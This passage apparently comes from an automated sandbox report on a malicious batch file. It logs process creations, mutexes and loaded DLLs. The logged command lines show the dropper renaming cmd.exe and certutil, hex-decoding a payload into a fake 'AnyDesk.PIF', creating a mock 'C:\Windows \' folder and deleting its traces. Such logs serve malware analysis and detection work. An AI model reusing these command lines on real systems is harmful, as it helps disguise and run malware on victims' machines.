                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823FFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,3_2_00007FF7823FFB54
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABAD98 CreateToolhelp32Snapshot,9_2_02ABAD98
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB04A0 CLSIDFromProgID,CoCreateInstance,#358,#358,#360,#357,#359,6_2_00007FF6A2AB04A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A86320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,6_2_00007FF6A2A86320
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_0041AADB
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7T
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o
                  Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                  Source: unknownProcess created: C:\Users\Public\Libraries\Puyiaiob.PIF "C:\Users\Public\Libraries\Puyiaiob.PIF"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: unknownProcess created: C:\Users\Public\Libraries\Puyiaiob.PIF "C:\Users\Public\Libraries\Puyiaiob.PIF"
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /oJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: learning_tools.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: webio.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ????.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: tquery.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppwmi.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: slc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppcext.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
